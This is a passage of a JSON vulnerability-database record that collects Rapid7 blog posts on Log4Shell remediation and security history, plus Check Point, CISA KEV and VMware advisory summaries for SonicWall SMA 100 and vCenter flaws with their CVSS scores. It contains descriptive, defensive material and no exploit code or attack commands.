By 2013, the effort resulted in the MITRE ATT&CK Framework that documented attacker tactics and techniques based on real-world observations of advanced persistent threat actors. With this framework, the security community has a common language and library to understand attackers \u2014 and what we can do to stop them.\n\nMITRE ATT&CK is open and available to anyone for use at no charge. Of course, detailed ATT&CK mapping is part of [InsightIDR\u2019s](<https://www.rapid7.com/products/insightidr/>) vast library of critical attacker behaviors and endpoint detections. \n\nNot long after MITRE published its first vulnerabilities, military systems at the Pentagon and NASA were breached by [a guy looking for evidence of UFOs](<https://www.bbc.com/news/uk-19946902>). The fun never ends. That same year, security expert and open source guru [H.D. Moore released](<https://www.oreilly.com/library/view/metasploit/9781593272883/pr04s03.html>) the first edition of his Metasploit Project with 11 exploits. Metasploit 2.0 followed quickly. With the 3.0 release, users began to contribute and a community was born.\n\nToday, [Rapid7\u2019s Metasploit](<https://www.rapid7.com/products/metasploit/>) is a voluntary collaboration between 300,000+ users and contributors around the world, including Rapid7 security engineers. It includes more than 1677 exploits organized over 25 platforms, and nearly 500 payloads. And it\u2019s a favorite of pen testers and red teamers worldwide.\n\n## The Cyber Threat Alliance took everything up a notch\n\nA nonprofit working to improve the security of our global digital ecosystem by enabling near real-time, high-quality threat information sharing, the [Cyber Threat Alliance (CTA)](<https://www.rapid7.com/blog/post/2021/10/13/security-nation-michael-daniel-on-the-cyber-threat-alliance/>) has staff and a technology platform for sharing advanced threat data. 
CTA members \u2014 often competitors \u2014 work together in good faith to distribute timely, actionable, contextualized, and campaign-based intelligence. \n\nRapid7 is among the members who, on average, share 5 million observable events per month. And the result: We all get ever-better at thwarting adversaries and improving our collective security. \n\n## In 2017, the holiday spirit became a quarterly thing for us\n\nThat\u2019s the year Rapid7 released our first threat intelligence report. Today, our quarterly Threat Reports share clear, distilled learnings and practical guidance from the wealth of data we continuously gather. Our sources include:\n\n * [Metasploit](<https://www.metasploit.com/>), now the world\u2019s most used pen testing framework\n * Rapid7\u2019s [Insight platform](<https://www.rapid7.com/products/insight-platform/>), covering vulnerability management, application security, detection and response, external threat intelligence, orchestration and automation, and more\n * Rapid7\u2019s [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), which conducts internet-wide surveys across more than 70 different services and protocols to gain insights into global exposure to common vulnerabilities typically unknown to IT teams\n * [Project Heisenberg](<https://www.rapid7.com/research/project-heisenberg/>), a globally distributed, low-interaction honeypot network that monitors for malicious inbound connections, and a forum for collaboration and confirmation relationships with other internet-scale researchers\n * Our global network of [Managed Detection and Response](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) (MDR) SOCs that use and vet Rapid7 products, do proactive threat hunting along with daily triage and remote incident response, and provide raw intelligence around emergent threats \n\nThe Internet connects everyone and everything with no centralized control. 
We put it together that way, and there\u2019s clearly no grand plan to make it secure. So we step up. Every time the malware operation Emotet resurfaces, a group of security researchers and system administrators reunites to fight it. (The only name we really know is what they call themselves: \u201cCryptolaemus.\u201d That\u2019s a mealy bug that goes after unhealthy plants.)\n\n## Yes, humans are cybersecurity\u2019s weakest link, but... \n\nMy father-in-law sent a $300 gift card to a hacker. We\u2019re easy marks, ruled by emotions that haven\u2019t changed much since we were cave-dwelling Paleolithic hominins. \n\nBut we\u2019re also us. You. \n\nWhatever winter holiday you celebrated, here\u2019s hoping it was a good one. And that you raised a glass to all the good folks, the good fight. Don\u2019t stop believing.\n\n**More Hacky Holidays blogs**\n\n * [Hacky Holidays: Celebrating the Best of Security Nation [Video]](<https://www.rapid7.com/blog/post/2021/12/13/hacky-holidays-celebrating-the-best-of-security-nation-video/>)\n * [Hacky Holidays From Rapid7! 
Announcing Our New Festive Blog Series](<https://www.rapid7.com/blog/post/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-03T15:00:00", "type": "rapid7blog", "title": "Sharing the Gifts of Cybersecurity \u2013 Or, a Lesson From My First Year Without Santa", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-03T15:00:00", "id": "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "href": "https://blog.rapid7.com/2022/01/03/sharing-the-gifts-of-cybersecurity-or-a-lesson-from-my-first-year-without-santa/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T20:18:00", "description": "\n\n[CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) rules everything around us \u2014 or so it seemed, at least, for those breathless days in December 2021 when the full scope of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) was starting to take hold and 
security teams were strapped for time and resources as they scoured their organizations' environments for vulnerable instances of Apache Log4j. But now that the peak intensity around this vulnerability has waned and we've had a chance to catch our collective breath, where does the effort to patch and remediate stand? What should security teams be focusing on today in the fight against Log4Shell?\n\nOn Wednesday, February 16, Rapid7 experts Bob Rudis, Devin Krugly, and Glenn Thorpe sat down for a webinar on the current state of the Log4j vulnerability. They covered where Log4Shell stands now, what the future might hold, and what organizations should be doing proactively to ensure they're as protected as possible against exploits.\n\n## Laying out the landscape\n\nGlenn Thorpe, Rapid7's Program Manager for Emergent Threat Response, kicked things off with a recap and retrospective of Log4Shell and why it seemingly set fire to the entire internet for a good portion of December. The seriousness of this vulnerability is due to the coming-together of several key factors, including:\n\n * The ability for vulnerable systems to grant an attacker full administrative access\n * The low level of skill required for exploitation \u2014 in many cases, attackers simply have to copy and paste\n * The attack vector's capability to run undetected over an encrypted channel\n * The pervasiveness of the Log4j library, which means vulnerability scanners alone can't act as complete solutions against this threat\n\nPut all this together, and it's no surprise that the volume of exploit attempts leveraging the Log4j vulnerability ramped up throughout December 2021 and has continued to spike periodically throughout January and February 2022. 
By January 10, ransomware using Log4Shell had been observed, and on January 14, Rapid7's MDR saw [mass Log4j exploits in VMware products](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>).\n\nBut while there's certainly been plenty of Log4j patching done, the picture on that front is far from complete. According to the [latest CISA data](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>) (also [here](<https://docs.google.com/spreadsheets/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit#gid=0>) as a daily-updated spreadsheet), there are still 320 cataloged software products that are known to be affected by vulnerable Log4j as of February 16, 2022 \u2014 and 1,406 still awaiting confirmation from the vendor.\n\n\n\n## Log4j today: A new normal?\n\nSo, where does the effort to put out Log4j fires stand now? Devin Krugly, Rapid7's Practice Advisor for Vulnerability Risk Management, thinks we're in a better spot than we were in December \u2014 but we're by no means out of the woods.\n\n\"We're effectively out of fire-fighting mode,\" said Devin. That means that, at this point, most security teams have identified the affected systems, implemented mitigations, and patched vulnerable versions of Log4j. But because of the complexity of today's software supply chains, there are often heavily nested dependencies within vendor systems \u2014 some of which Log4j may still be implicated in. This means it's essential to have a solid inventory of vendor software products that may be using Log4j and to ensure those instances of the library are updated and patched.\n\n\"Don't lose that momentum,\" Glenn chimed in. \"Don't put that on your post-mortem action list and forget about it.\"\n\nThis imperative is all the more critical because of a recent uptick in Log4Shell activity. 
Rapid7's Chief Data Scientist Bob Rudis laid out some [activity detected by the Project Heisenberg honeypot fleet](<https://www.rapid7.com/research/project-doppler/>) indicating a revival of Log4j activity in early and mid-February, much of it from new infrastructure and scanning hosts that hadn't been seen before.\n\nAmid this increase in activity, vulnerable instances of Log4j are anything but gone from the internet. In fact, data from [Sonatype](<https://www.sonatype.com/resources/log4j-vulnerability-resource-center>) as of February 16, 2022 indicates 39% of Log4j downloads are _still _versions vulnerable to Log4Shell.\n\n\u201cWe're going to be seeing Log4j attempts on the internet, on the regular, at a low level, forever,\" Bob said. Log4Shell is now in a family with WannaCry and Conficker (yes, that Conficker) \u2014 vulnerabilities that are around indefinitely, and which we'll need to continually monitor for as attackers use them to try to breach our defenses.\n\n## Navigating life with Log4Shell\n\nAdopting a defense-in-depth posture in the \"new normal\" of life with Log4Shell is sure to come with its share of headaches. Luckily, Bob, Devin, and Glenn shared some practical strategies that security teams can adopt to keep their organizations' defenses strong and avoid some common pitfalls.\n\n### Go beyond compensating controls\n\n\"My vendor says they've removed the JNDI class from the JAR file \u2014 does that mean their application is no longer vulnerable to Log4Shell?\" This question came up in a few different forms from our webinar audience. The answer from our panelists was nuanced but crystal-clear: maybe for now, but not forever.\n\nRemoving the JNDI class is a compensating control \u2014 one that provides a quick fix for the vulnerability but doesn't patch the core, underlying problem via a full update. 
For example, when you do a backup, you might unknowingly reintroduce the JNDI class after removing it \u2014 or, as Devin pointed out, an attacker could chain together a replacement for it.\n\nThese kinds of compensating or mitigating controls have their place in a short-term response, but there's simply no action that can replace the work of upgrading all instances of Log4j to the most up-to-date versions that contain patches for Log4Shell.\n\n\"Mitigate for speed, but not in perpetuity,\" Glenn recommended.\n\n### Find the nooks and crannies\n\nToday's cloud-centric IT environments are increasingly ephemeral and on-demand \u2014 a boost for innovation and speed, but that also means teams can deploy workloads without security teams ever knowing about it. Adopting an \"Always Be Scanning\" mindset, as Bob put it, is essential to ensure vulnerable instances of Log4j aren't introduced into your environment.\n\nContinually scanning your internet-facing components is a good and necessary start \u2014 but the work doesn't end there. As Devin pointed out, finding the nooks and crannies where Log4j might crop up is critical. This includes scouring containers and virtual machines, as well as analyzing application and server logs for malicious JNDI strings. 
You should also ensure your [security operations center (SOC)](<https://www.rapid7.com/fundamentals/security-operations-center/>) team can quickly and easily identify indicators that your environment is being scanned for reconnaissance into Log4Shell exploit opportunities.\n\n\u201cInvolving the SOC team for alerting purposes, if you haven't already done that, is an absolute necessity in this case,\" said Devin.\n\n### Get better at vendor management\n\nIt should be clear by now that in a post-Log4j world, organizations must demand the highest possible level of visibility into their software supply chain \u2014 and that means being clear, even tough, with vendors.\n\n\u201cManaging stuff on the internet is hard because organizations are chaotic beings by nature, and you're trying to control the chaos as a security professional,\" said Bob. Setting yourself up for success in this context means having the highest level of visibility possible. After all, how many other vulnerabilities just as bad as Log4Shell \u2014 or even worse \u2014 might be out there lurking in the corners of your vendors' code?\n\nThe upcoming US government requirements around [Software Bill of Materials (SBOM)](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>) for vendor procurement should go a long way toward raising expectations for software vendors. Start asking vendors if they can produce an SBOM that details remediation and update of any vulnerable instances of Log4j.\n\nThese conversations don't need to be adversarial \u2014 in fact, vendors can be a key resource in the effort to defend against Log4Shell. 
Especially for smaller organizations or under-resourced security teams, relying on capable third parties can be a smart way to bolster your defenses.\n\n## Only you can secure the software supply chain\n\nOK, maybe that subhead is not literally true \u2014 a secure software supply chain is a community-wide effort, to which we must all hold each other accountable. The cloud-based digital ecosystem we all inhabit, whether we like it or not, is fundamentally interconnected. A pervasive vulnerability like Log4Shell is an unmistakable reminder of that fact.\n\nIt also serves as an opportunity to raise our expectations of ourselves, our organizations, and our partners \u2014 and those choices do start at home, with each security team as they update their applications, continually scan their environments, and demand visibility from their vendors. Those actions really do help create a more secure internet for everyone.\n\nSo while we'll be living with Log4Shell probably forever, it'll be living with us, too. And as scared as you are of the spider, it's even more scared of your boot.\n\n_Want to go more in-depth? Check out the full replay of our webinar, \"[Log4Shell Two Months Later: Lessons and Insights for Protectors](<https://information.rapid7.com/Log4Shell-Two-Months-Later.html>).\"_\n\n**Quick resources:**\n\nBob, Devin, and Glenn mentioned a wealth of handy links in their discussion. 
Here are those resources for quick, easy reference.\n\n * [CISA's Log4j Affected Database spreadsheet](<https://docs.google.com/spreadsheets/u/1/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit?usp=drive_web&ouid=112199732671088168182>)\n * [CISA's Log4j Affected Database table](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>)\n * [CISA Known Exploited Vulnerabilities (KEV) catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)\n * [Project Doppler](<https://www.rapid7.com/research/project-doppler/>)\n * [ShadowServer](<https://www.shadowserver.org/>)\n * [SBOM information from the US government](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>)\n\n_**Additional reading:**_\n\n * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Active Exploitation of VMware Horizon Servers](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>)_\n * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_\n * _[The Everyperson\u2019s Guide to Log4Shell (CVE-2021-44228)](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T18:00:00", "type": "rapid7blog", "title": "Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T18:00:00", "id": "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "href": "https://blog.rapid7.com/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-06-09T15:44:21", "description": "A command injection vulnerability exists in SonicWall SMA 100. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "checkpoint_advisories", "title": "SonicWall SMA 100 Command Injection (CVE-2021-20039)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20039"], "modified": "2022-06-09T00:00:00", "id": "CPAI-2021-1187", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:29:19", "description": "A buffer overflow vulnerability exists in SonicWall SMA100. 
Successful exploitation of this vulnerability could result in a denial of service or execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-06T00:00:00", "type": "checkpoint_advisories", "title": "SonicWall SMA100 Buffer Overflow (CVE-2021-20038)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-02-06T00:00:00", "id": "CPAI-2021-1065", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:19", "description": "An authentication bypass vulnerability exists in VMware VCenter Server Directory Service. 
Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-26T00:00:00", "type": "checkpoint_advisories", "title": "VMware VCenter Server Directory Service Authentication Bypass (CVE-2020-3952)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-10-26T00:00:00", "id": "CPAI-2020-1024", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "SonicWall SMA 100 devices are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-28T00:00:00", "type": "cisa_kev", "title": "SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-01-28T00:00:00", "id": "CISA-KEV-CVE-2021-20038", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Info Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-3952", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2022-05-26T00:56:18", "description": "3\\. VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952) \n\nUnder certain conditions[1] vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 10.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-09T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-16T00:00:00", "id": "VMSA-2020-0006.1", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0006.1.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-11T22:42:33", "description": "##### 1\\. Impacted Products\n\n * VMware vCenter Server\n\n##### 2\\. Introduction\n\n###### A sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) was privately reported to VMware. vCenter updates are available to address this vulnerability. \n\n\n###### \n\n##### 3\\. VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952) \n\n\n**Description: \n**\n\nUnder certain conditions1 vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls. VMware has evaluated the severity of this issue to be in the [Critical severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [10.0](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors:**\n\nA malicious actor with network access to an affected vmdir deployment may be able to extract highly sensitive information which could be used to compromise vCenter Server or other services which are dependent upon vmdir for authentication. \n\n\n**Resolution:**\n\nTo remediate CVE-2020-3952 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds:**\n\nNone.\n\n**Additional Documentation:**\n\nVMware has created [KB78543](<https://kb.vmware.com/s/article/78543>) which details steps to determine whether or not a particular deployment is affected by CVE-2020-3952. 
\n\n\n**Acknowledgements:**\n\nNone.\n\n**Notes:**\n\n1vCenter Server 6.7 (embedded or external PSC) prior to 6.7u3f is affected by CVE-2020-3952 if it was upgraded from a previous release line such as 6.0 or 6.5. Clean installations of vCenter Server 6.7 (embedded or external PSC) are not affected.\n\n**Response Matrix:**\n", "cvss3": {}, "published": "2020-04-09T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-09T00:00:00", "id": "VMSA-2020-0006", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0006.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T14:07:01", "description": "##### **1\\. Impacted Products (Under Evaluation)**\n\n * VMware Horizon \n\n * VMware vCenter Server\n * VMware HCX \n\n * VMware NSX-T Data Center\n * VMware Unified Access Gateway\n * VMware WorkspaceOne Access\n * VMware Identity Manager \n * VMware vRealize Operations\n * VMware vRealize Operations Cloud Proxy\n * VMware vRealize Automation \n\n * VMware vRealize Lifecycle Manager\n * VMware Site Recovery Manager, vSphere Replication \n\n * VMware Carbon Black Cloud Workload Appliance\n * VMware Carbon Black EDR Server\n * VMware Tanzu GemFire \n\n * VMware Tanzu Greenplum\n * VMware Tanzu Operations Manager\n * VMware Tanzu Application Service for VMs\n * VMware Tanzu Kubernetes Grid Integrated Edition\n * VMware Tanzu Observability by Wavefront Nozzle\n * Healthwatch for Tanzu Application Service \n\n * Spring Cloud Services for VMware Tanzu\n * Spring Cloud Gateway for VMware Tanzu\n * Spring Cloud Gateway for Kubernetes\n * API Portal for VMware Tanzu\n * Single Sign-On for VMware Tanzu Application Service\n * App Metrics\n * VMware vCenter Cloud Gateway\n * VMware vRealize Orchestrator \n\n * VMware 
Cloud Foundation\n * VMware Workspace ONE Access Connector\n * VMware Horizon DaaS\n * VMware Horizon Cloud Connector \n\n * VMware NSX Data Center for vSphere\n * VMware AppDefense Appliance\n * VMware Cloud Director Object Storage Extension\n * VMware Telco Cloud Operations \n\n * VMware vRealize Log Insight\n * VMware Tanzu Scheduler\n * VMware Smart Assurance NCM\n * VMware Smart Assurance SAM [Service Assurance Manager] \n\n * VMware Integrated OpenStack\n * VMware vRealize Business for Cloud\n * (Additional products will be added) \n\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware products. \n\nThis is an ongoing event, please check this advisory for frequent updates as they develop. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nRemote code execution vulnerability via Apache Log4j.\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2021-44228 to this issue.\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system. \n\n\n**Resolution**\n\nFixes for CVE-2021-44228 are documented in the 'Fixed Version' column of the 'Response Matrix' below. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-44228 are documented in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional 